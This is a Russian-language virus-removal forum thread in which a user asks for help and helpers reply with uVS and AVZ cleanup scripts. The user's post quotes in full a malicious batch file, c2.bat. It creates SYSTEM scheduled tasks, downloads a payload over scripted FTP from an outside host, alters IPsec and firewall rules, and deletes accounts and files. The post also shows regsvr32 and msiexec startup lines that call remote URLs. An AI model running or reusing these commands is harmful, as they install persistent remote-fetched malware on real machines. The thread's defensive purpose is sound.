Перейти к содержанию

Win32:Pup-gen или Backdoor.Win32.Mirai


Рекомендуемые сообщения

Здравствуйте. Проблема возникла в день когда я закрывал не нужные порты, как оказалось в дальнейшем нужные. Проблема была обнаружена случайно в диспетчере задач начали грузится неизвестные мне процессы.  За первое сканирование Аваст ничего не нашел. При чистке ccleaner в автозагрузке прописались 2 строки (Примерные строки):
regsvr32 /u /s /i:вирусная ссылкаscrobj.dll а так же 
msiexec.exe /i вирусная ссылка
 
в реестре
"HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start1" "HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start"  
 
в папке винды был найден файл и логи  Windows/debug/item.dat
через день был создан в этой же папке БАТНИК c2.bat
 

БАТНИК c2.bat:

 

ping 127.0.0.1 -n 10
net1 user IISUSER$ /del&net1 user IUSR_Servs /del
cacls c:\windows\twain_32\csrss.exe /e /d system&cacls c:\windows\twain_32\csrss.exe /e /d everyone&del c:\windows\twain_32\*.*
schtasks /create /tn "Mysa1" /tr "rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa" /ru "system"  /sc onstart /F
schtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p" /ru "system"  /sc onstart /F
netsh ipsec static add policy name=win
netsh ipsec static add filterlist name=Allowlist
netsh ipsec static add filterlist name=denylist
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
netsh ipsec static add filteraction name=Allow action=permit
netsh ipsec static add filteraction name=deny action=block
netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
netsh ipsec static set policy name=win assign=y 
ver | find "5.1." > NUL && sc config SharedAccess start= auto && net start SharedAccess && netsh firewall set opmode mode=enable && netsh firewall set portopening protocol = ALL port = 445 name = 445 mode = DISABLE scope = ALL profile = ALL
@Wmic Process Where "Name='winlogon.exe' And ExecutablePath='C:\Windows\system\winlogon.exe'" Call Terminate &del C:\Windows\system\winlogon.exe
@Wmic Process Where "Name='svchost.exe' And ExecutablePath='C:\Windows\system\svchost.exe'" Call Terminate &del C:\Windows\system\svchost.exe
@Wmic Process Where "Name='svchost.exe' And ExecutablePath='C:\Windows\twain_32\svchost.exe'" Call Terminate &del C:\Windows\twain_32\svchost.exe
@Wmic Process Where "Name='csrss.exe' And ExecutablePath='C:\Windows\twain_32\csrss.exe'" Call Terminate &del C:\Windows\twain_32\csrss.exe
@Wmic Process Where "Name='csrss.exe' And ExecutablePath='C:\Windows\tasks\csrss.exe'" Call Terminate &del C:\Windows\tasks\csrss.exe
del C:\WINDOWS\Debug\c2.bat
exit

 

 

 
 
Просканировал и Avast (нашел C:\windows\notepad.exe как Win32:Pup-gen ) Dr.Web и Kaspersky вроде ничего не нашли.
 
Прошелся по сайтам просканировал по удалял программами AdwCleaner,  Universal Virus Sniffer, AVZ, HijackThis.exe dwsysinfo.exe
 
В результате в папке  C:\WINDOWS\Debug\ остается файл лог PASSWD.LOG и не удаляется. В автозагрузка start start1 так и отаются.
Может вирус остал незнаю, но рисковать не охота, да и переустанавливать винду тоже. Стоит ли волноваться ?
 
Во вложении логи и скрины  AdwCleaner,  Universal Virus Sniffer, AVZ, HijackThis.exe dwsysinfo.exe
 
Если что не так вы уж извините я не "шарю".
 
Надеюсь на вашу поддержку заранее спасибо.

вирус0логу.rar

Изменено пользователем regist
Ссылка на комментарий
Поделиться на другие сайты

Здравствуйте,


Удалите в AdwCleaner всё, кроме папок с названиями программ которыми вы пользуетесь (если ничем из перечисленного в логе не пользуетесь, то удалите всё). Отчет после удаления прикрепите.

Выполните скрипт в uVS:

;uVS v4.0.2 [http://dsrt.dyndns.org]
;Target OS: NTv5.1
v400c
OFFSGNSAVE
BREG
;---------command-block--------
zoo %SystemRoot%\DEBUG\C2.BAT
delref WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
delref HTTP://INET123.RU/?CX=PARTNER-PUB-7107628092852806%3ASXITI5-KTQK&COF=FORID%3A10&IE=UTF-8&Q={SEARCHTERMS}&SA=%CF%EE%E8%F1%EA&SITEURL=INET123.RU%2F#881
delref %SystemDrive%\DOCUMENTS AND SETTINGS\LIS\LOCAL SETTINGS\TEMP\40C7023A.SYS
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\GOOGLEUPDATE.EXE
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.21.169\PSMACHINE.DLL
del %SystemRoot%\DEBUG\C2.BAT
delref %SystemRoot%\TEMP\34A61A48-9270-4DE0-8922-65BADD484D9E
delref %SystemRoot%\TEMP\35872F97-8A73-4D6F-8156-CC38CF6D951E
delref %SystemRoot%\TEMP\4F9B30B2-983E-4016-B4CB-95AB3F09B805
delref %SystemRoot%\TEMP\5EDAB485-849A-44AD-9367-165D57A39241
delref %SystemRoot%\TEMP\421D46C5-7BB9-4E0B-B8B6-8DE4F52E9D63
delref %SystemRoot%\TEMP\C80C1669-02D7-47E2-984B-A2291EA0D87C
delref %SystemRoot%\TEMP\FD6D963D-8016-4E10-8B7D-B41625551AC3
apply

restart 


Прикпепите автологер согласно правилам.

Ссылка на комментарий
Поделиться на другие сайты


AVZ выполнить следующий скрипт.
Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 QuarantineFile('msiexec.exe','');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start1','command');
BC_ImportQuarantineList;
BC_Activate;
 ExecuteRepair(1);
RebootWindows(false);
end.

После выполнения скрипта компьютер перезагрузится.

После перезагрузки:
- Выполните в AVZ:
begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.
quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com.
1. В заголовке письма напишите "Запрос на исследование вредоносного файла".
2. В письме напишите "Выполняется запрос хэлпера".
3. Прикрепите файл карантина и нажмите "Отправить"
4. Полученный ответ сообщите здесь (с указанием номера KLAN)



AVZ -> Файл -> Мастер поиска и устранения проблем -> Системные проблемы -> Пуск -> Отметьте пункт указанный выше -> Исправить отмеченные проблемы.
 
 >>  Установлена большая задержка перед открытием меню (более секунды)

 
- Подготовьте лог AdwCleaner и приложите его в теме.
 

Ссылка на комментарий
Поделиться на другие сайты


Удалите в AdwCleaner. Отчет после удаления прикрепите.

Найден ключ: HKU\S-1-5-21-1757981266-1580436667-1417001333-1003\Software\Conduit
Найден ключ: HKCU\Software\Conduit
Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • Belvol
      Автор Belvol
      Здравствуйте. Поймал троян-майнер. Чищу антивирусом и после перезагрузки появляется снова. Помогите разобраться, пожалуйста
      CollectionLog-2025.07.01-00.20.zip
    • ЕвгенийСемиряков
      Автор ЕвгенийСемиряков
      Здравствуйте! Zip-файл с логами прикрепил (CollectionLog-2025.05.21-23.26.zip).

      21.05.2025 (после 21:00 по МСК) установил на ноутбук Kaspersky Premium. После проверки обнаружилось несколько вирусных файлов. Сначала это были "MEM:Backdoor.Win32.Insistent.gen". Затем после нескольких очисток и перезагрузок файлы каждый раз восстанавливались и в итоге увеличились в количестве:
      (ниже указал все, что показывает Касперский)
      "HEUR:Trojan-Spy.Script.Agent.gen" (в больших количествах);
      "MEM:Backdoor.Win32.Insistent.gen";
      "HEUR:Trojan.OLE2.Alien.gen";
      "HEUR:Trojan.Script.Agent.gen";
      "HEUR:Trojan-PSW.Win32.Stealer.gen";
      "HEUR:Trojan.Win32.Agentb.gen";
      "UDS:DangerousObject.Multi.Generic";
      "UDS:Trojan.Win32.Shelm";
      "UDS:Trojan-Downloader.Win32.Agent.gen";
      "HEUR:Trojan.Win32.Ekstak.gen";
      "HEUR:Trojan.Win64.Miner.gen";
      "HEUR:Trojan.VBS.Starter.gen".

      Также некоторые приложения указаны как "Легальное приложение, которое может быть использовано злоумышленниками для нанесения вреда компьютеру или данным пользователя" или "Рекламное приложение". Среди них, например, "Офис 2019 Ворд, Эксель, Поверпойнт", который я скачивал с проверенного сайта.

      Приложил отчёт по этим объектам (otchet_21.05.2025_23.22.txt). Логи обнаружений из журналов антивируса я, к сожалению, не нашёл.
      Сразу приложу образ автозапуска системы в uVS (DESKTOP-33LHKN5_2025-05-22_00-42-41_v4.15.rar).

      Пробовал решить проблему самостоятельно по этому гайду с вашего форума (прикреплю на всякий случай ниже). Выполнил в uVS скрипт из буфера обмена. Это не помогло


      CollectionLog-2025.05.21-23.26.zip otchet_21.05.2025_23.22.txt DESKTOP-33LHKN5_2025-05-22_00-42-41_v4.15.rar
    • жаждущий ответа
      Автор жаждущий ответа
      CollectionLog-2025.03.19-16.56.zip
      Виндовс долго загружается ,не получается зайти в редактор реестра, он сразу крашится, в касперском пишет про такой троян trojan win32 sepeh gen
    • MultiFace
      Автор MultiFace
      Добрый день, касперски обнаружил 76 объектов вредоносных, но не может удалить 
      Помогите в решении пожалуйста 
      CollectionLog-2025.02.21-18.47.zip 111.txt avz_log.txt
    • OLEGGih
      Автор OLEGGih
      Здравствуйте. Антивирус ругается на conhost trojan multi agent gen. При лечении с перезагрузкой удалить не может. Установлен Kaspersky Free. Помогите пожалуйста
      CollectionLog-2025.03.11-15.09.zip
×
×
  • Создать...